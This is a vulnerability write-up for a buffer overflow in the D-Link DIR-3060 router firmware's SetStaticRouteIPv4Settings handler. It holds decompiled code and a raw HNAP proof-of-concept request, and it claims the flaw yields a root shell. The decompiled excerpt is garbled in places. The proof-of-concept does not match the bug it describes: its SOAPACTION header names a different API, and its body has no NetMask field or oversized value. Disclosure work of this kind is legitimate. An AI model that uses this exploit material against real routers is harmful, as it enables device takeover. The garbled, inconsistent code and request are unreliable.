

D-Link DIR3060A1_FW111B04.bin Overflow vulnerability

Overview

- Manufacturer's website information: https://www.dlink.com/
- Firmware download address: https://tsd.dlink.com.tw/

DIR-3060 prog.cgi Keyword api SetStaticRouteIPv4Settings.Overflow vulnerability exists

Vulnerability details

IVar3 parameter obtains NetMask value

```
snprintf(acStack1288,0x100,

"/SetStaticRouteIPv4Settings/StaticRouteIPv4Data/SRIPv4Info:%d/%s",local_9c0,

"NetMask");

iVar3 = webGetVarString(param_1,acStack1288);

if (iVar3 == 0) {
   local_9bc = 0xb;
   goto LAB_0049b84c;
```

Function FUN_ 0049ac18(), call parameter iVar3

```
123
124
125
126

FUN_0049ac18(acStack2456,iVar3);
snprintf(acStack2440,0x20,"StaticRouteIPv4_%d",local_9c0,pcVar9);
iVar6 = strcmp(__s1,"true");
```

The function directly copies the value of iVar3 to local_ 5c, and the length is not verified, which is prone to overflow vulnerability.

```
void FUN_0049ac18(char *param_1,char *param_2)

{
    ...
    ...
    undefined4 local_5c;
    local_5c = 0;
    ....

strcpy((char *)&local_6c,param_1);
    Tw split rules(&local 6c,&local 4c,&DAT_004ebc90);

strcpy((char *)&local_5c,alocal_3c,&DAT_004ebc90);

tocal_2c = atoi(local_4c);
    uVar1 = atoi(local_3c);
    local_28 = atoi(local_48);
    uVar1 = atoi(local_38);
```

POC

1. Attack with the following POC attacks

```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:7018
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Fi
Accept: text/xml
Accept-Language: zh-CN, zh; q=0.8, zh-TW; q=0.7, zh-HK; q=0.5, en-US; q=0.3, en; q=0.2
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetNetworkSettings"
HNAP AUTH: 3C5A4B9EECED160285AAE8D34D8CBA43 1649125990491
Content-Length: 632
Origin: http://192.168.0.1:7018
Connection: close
Referer: http://192.168.0.1:7018/Network.html
Cookie: SESSION_ID=2:1556825615:2; uid=TFKV4ftJ
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</pre>
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
```

```
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
            <SetStaticRouteIPv4Settings>
                  <StaticRouteIPv4Data>
                        <SRIPv4Info>
                        <Enabled>true</Enabled>
                        <Name></Name>
                        <IPAddress>192.168.0.1</IPAddress>
                        <Gateway>192.168.0.254</Gateway>
                        <Metric></Metric>
                        <Interface></Interface>
                        </SRIPv4Info>
                  </StaticRouteIPv4Data>
            </SetStaticRouteIPv4Settings>
      </soap:Body>
</soap:Envelope>
```

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell